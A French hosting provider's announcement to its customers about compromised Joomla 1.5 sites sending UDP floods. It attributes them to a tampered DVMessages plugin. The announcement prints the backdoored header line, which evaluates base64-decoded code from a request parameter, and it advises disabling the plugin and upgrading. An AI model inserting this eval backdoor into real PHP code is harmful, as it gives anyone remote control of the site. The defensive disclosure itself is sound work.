Je vois de plus en plus des attaques par flood UDP sortant de certains sites des hébergés de la plateforme de FranceServ Hébergement. Ces attaques sortantes sont bien entendue bloquées mais elles créent une charge inutile supplémentaire au service et incite des robots malveillants à inonder ces sites vérolés de requêtes abusives en les répertoriant par la même occasion.
Cette faille de sécurité est présente dans l'extension DVMessages du CMS Joomla, apparemment à la version 1.5 et probablement supérieure. Ce qui est sûr, c'est qu'à partir de Joomla 2.5 ce problème est corrigé étant donné que cette extension a été abandonnée à partir de cette version (http://extensions.joomla.org/extensions ... ames/10999).
Le fichier original de cette extension commence par les lignes suivantes :
Code : Tout sélectionner
<?php
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );
jimport( 'joomla.plugin.plugin' );
Code : Tout sélectionner
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
/plugins/system/dvmessages.php
/plugins/system/dvmessages/dvmessages.php
On remarque que le die de sécurité qui bloque la connexion lorsqu'il y a tentative d'intrusion a été remplacé par l'exécution d'un paramètre dans la requêtes. N'importe qui peut alors exécuter n'importe quoi, supprimer ou modifier le site entièrement, envoyer du phishing à l'intérieur, des scripts PHP d'attaques, en un mot, prendre le contrôle total du site.
Cette faille de sécurité est évoquée dans le forum officiel de Joomla en anglais : http://forum.joomla.org/viewtopic.php?f=621&t=791651 ayant pour titre : "dvmessages.php is being reported as phishing file?"
Les hébergeurs des personnes concernées dans ce fil de discussion lancent des alertes aux hébergés, leur demandant de corriger la situation, ce que je fais présentement car la situation se dégrade.
La version 1.5 de Joomla est maintenant trop âgées et semble de plus en plus vulnérable, il faut impérativement mettre à jour vos solutions. Dans un premier temps, désactivez cette extension et sauvegardez vos données avant de mettre à jour votre Joomla à la dernière version.
Les sites des hébergés infectés par cette faille de sécurité et détectés par mes robots de protections, seront mis hors ligne et son propriétaire sera informé de la raison à l'aide de cette annonce.